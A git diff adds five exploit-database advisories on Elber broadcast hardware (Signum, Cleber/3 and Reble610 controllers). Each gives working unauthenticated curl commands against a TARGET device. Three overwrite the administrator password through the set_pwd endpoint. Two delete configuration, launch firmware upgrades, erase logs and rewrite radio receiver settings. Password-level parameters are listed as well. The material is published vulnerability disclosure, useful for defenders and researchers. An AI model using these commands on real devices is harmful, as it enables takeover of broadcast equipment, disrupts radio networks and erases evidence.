Merge remote-tracking branch 'upstream/main'

exploits/hardware/webapps/52002.txt

@@ -0,0 +1,76 @@
+Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: 1.999 Revision 1243
+                  1.317 Revision 602
+                  1.220 Revision 1250
+                  1.220 Revision 1248_1249
+                  1.220 Revision 597
+                  1.217 Revision 1242
+                  1.214 Revision 1023
+                  1.193 Revision 924
+                  1.175 Revision 873
+                  1.166 Revision 550
+
+Summary: The SIGNUM controller from Elber satellite equipment demodulates
+one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving
+256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
+and configured in 1+1 seamless switching for redundancy. Redundancy can also
+be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
+audio codec, providing analog and digital outputs; moreover, it’s possible
+to set a data PID to be decoded and passed to the internal RDS encoder,
+generating the dual MPX FM output.
+
+Desc: The device suffers from an authentication bypass vulnerability through
+a direct and unauthorized access to the password management functionality. The
+issue allows attackers to bypass authentication by manipulating the set_pwd
+endpoint that enables them to overwrite the password of any user within the
+system. This grants unauthorized and administrative access to protected areas
+of the application compromising the device's system security.
+
+--------------------------------------------------------------------------
+/modules/pwd.html
+------------------
+50: function apply_pwd(level, pwd)
+51: {
+52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
+53: 	function(data){
+54: 		//$.alert({title:'Operation',text:data});
+55: 		show_message(data);
+56: 	}).fail(function(error){
+57: 		show_message('Error ' + error.status, 'error');
+58: 	});
+59: }
+
+--------------------------------------------------------------------------
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5814
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php
+
+
+18.08.2023
+
+--
+
+
+$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
+
+Ref (lev param):
+
+Level 7 = SNMP Write Community (snmp_write_pwd)
+Level 6 = SNMP Read Community (snmp_read_pwd)
+Level 5 = Custom Password? hidden. (custom_pwd)
+Level 4 = Display Password (display_pwd)?
+Level 2 = Administrator Password (admin_pwd)
+Level 1 = Super User Password (puser_pwd)
+Level 0 = User Password (user_pwd)

exploits/hardware/webapps/52003.txt

@@ -0,0 +1,77 @@
+Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: 1.999 Revision 1243
+                  1.317 Revision 602
+                  1.220 Revision 1250
+                  1.220 Revision 1248_1249
+                  1.220 Revision 597
+                  1.217 Revision 1242
+                  1.214 Revision 1023
+                  1.193 Revision 924
+                  1.175 Revision 873
+                  1.166 Revision 550
+
+Summary: The SIGNUM controller from Elber satellite equipment demodulates
+one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving
+256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
+and configured in 1+1 seamless switching for redundancy. Redundancy can also
+be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
+audio codec, providing analog and digital outputs; moreover, it’s possible
+to set a data PID to be decoded and passed to the internal RDS encoder,
+generating the dual MPX FM output.
+
+Desc: The device suffers from an unauthenticated device configuration and
+client-side hidden functionality disclosure.
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5815
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php
+
+
+18.08.2023
+
+--
+
+
+# Config fan
+$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
+Configuration applied
+
+# Delete config
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
+File delete successfully
+
+# Launch upgrade
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
+Upgrade launched Successfully
+
+# Log erase
+$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
+Logs erased
+
+# Until:
+# =0 ALL
+# =-2 Yesterday
+# =-8 Last week
+# =-15 Last two weeks
+# =-22 Last three weeks
+# =-31 Last month
+
+# Set RX config
+$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
+RX Config Applied Successfully
+
+# Show factory window and FPGA upload (Console)
+> cleber_show_factory_wnd()
+
+# Etc.

exploits/hardware/webapps/52004.txt

@@ -0,0 +1,73 @@
+Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: 1.0.0 Revision 7304
+                  1.0.0 Revision 7284
+                  1.0.0 Revision 6505
+                  1.0.0 Revision 6332
+                  1.0.0 Revision 6258
+                  XS2DAB v1.50 rev 6267
+
+Summary: Cleber offers a powerful, flexible and modular hardware and
+software platform for broadcasting and contribution networks where
+customers can install up to six boards with no limitations in terms
+of position or number. Based on a Linux embedded OS, it detects the
+presence of the boards and shows the related control interface to the
+user, either through web GUI and Touchscreen TFT display. Power supply
+can be single (AC and/or DC) or dual (hot swappable for redundancy);
+customer may chose between two ranges for DC sources, that is 22-65
+or 10-36 Vdc for site or DSNG applications.
+
+Desc: The device suffers from an authentication bypass vulnerability through
+a direct and unauthorized access to the password management functionality. The
+issue allows attackers to bypass authentication by manipulating the set_pwd
+endpoint that enables them to overwrite the password of any user within the
+system. This grants unauthorized and administrative access to protected areas
+of the application compromising the device's system security.
+
+--------------------------------------------------------------------------
+/modules/pwd.html
+------------------
+50: function apply_pwd(level, pwd)
+51: {
+52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
+53: 	function(data){
+54: 		//$.alert({title:'Operation',text:data});
+55: 		show_message(data);
+56: 	}).fail(function(error){
+57: 		show_message('Error ' + error.status, 'error');
+58: 	});
+59: }
+
+--------------------------------------------------------------------------
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5816
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php
+
+
+18.08.2023
+
+--
+
+
+$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
+
+Ref (lev param):
+
+Level 7 = SNMP Write Community (snmp_write_pwd)
+Level 6 = SNMP Read Community (snmp_read_pwd)
+Level 5 = Custom Password? hidden. (custom_pwd)
+Level 4 = Display Password (display_pwd)?
+Level 2 = Administrator Password (admin_pwd)
+Level 1 = Super User Password (puser_pwd)
+Level 0 = User Password (user_pwd)

exploits/hardware/webapps/52006.txt

@@ -0,0 +1,69 @@
+Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: 0.01 Revision 0
+
+Summary: The REBLE610 features an accurate hardware design, absence of
+internal cabling and full modularity. The unit is composed by a basic
+chassis with 4 extractable boards which makes maintenance and critical
+operations, like frequency modification, easy and efficient. The modular
+approach has brought to the development of the digital processing module
+(containing modulator, demodulator and data interface) and the RF module
+(containing Transmitter, Receiver and channel filters). From an RF point
+of view, the new transmission circuitry is able to guarantee around 1 Watt
+with every modulation scheme, introducing, in addition, wideband precorrection
+(up to 1GHz depending on frequency band).
+
+Desc: The device suffers from an authentication bypass vulnerability through
+a direct and unauthorized access to the password management functionality. The
+issue allows attackers to bypass authentication by manipulating the set_pwd
+endpoint that enables them to overwrite the password of any user within the
+system. This grants unauthorized and administrative access to protected areas
+of the application compromising the device's system security.
+
+--------------------------------------------------------------------------
+/modules/pwd.html
+------------------
+50: function apply_pwd(level, pwd)
+51: {
+52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
+53: 	function(data){
+54: 		//$.alert({title:'Operation',text:data});
+55: 		show_message(data);
+56: 	}).fail(function(error){
+57: 		show_message('Error ' + error.status, 'error');
+58: 	});
+59: }
+
+--------------------------------------------------------------------------
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5818
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php
+
+
+18.08.2023
+
+--
+
+
+$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
+
+Ref (lev param):
+
+Level 7 = SNMP Write Community (snmp_write_pwd)
+Level 6 = SNMP Read Community (snmp_read_pwd)
+Level 5 = Custom Password? hidden. (custom_pwd)
+Level 4 = Display Password (display_pwd)?
+Level 2 = Administrator Password (admin_pwd)
+Level 1 = Super User Password (puser_pwd)
+Level 0 = User Password (user_pwd)

exploits/hardware/webapps/52007.txt

@@ -0,0 +1,70 @@
+Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: 0.01 Revision 0
+
+Summary: The REBLE610 features an accurate hardware design, absence of
+internal cabling and full modularity. The unit is composed by a basic
+chassis with 4 extractable boards which makes maintenance and critical
+operations, like frequency modification, easy and efficient. The modular
+approach has brought to the development of the digital processing module
+(containing modulator, demodulator and data interface) and the RF module
+(containing Transmitter, Receiver and channel filters). From an RF point
+of view, the new transmission circuitry is able to guarantee around 1 Watt
+with every modulation scheme, introducing, in addition, wideband precorrection
+(up to 1GHz depending on frequency band).
+
+Desc: The device suffers from an unauthenticated device configuration and
+client-side hidden functionality disclosure.
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5819
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php
+
+
+18.08.2023
+
+--
+
+
+# Config fan
+$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
+Configuration applied
+
+# Delete config
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
+File delete successfully
+
+# Launch upgrade
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
+Upgrade launched Successfully
+
+# Log erase
+$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
+Logs erased
+
+# Until:
+# =0 ALL
+# =-2 Yesterday
+# =-8 Last week
+# =-15 Last two weeks
+# =-22 Last three weeks
+# =-31 Last month
+
+# Set RX config
+$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
+RX Config Applied Successfully
+
+# Show factory window and FPGA upload (Console)
+> cleber_show_factory_wnd()
+
+# Etc.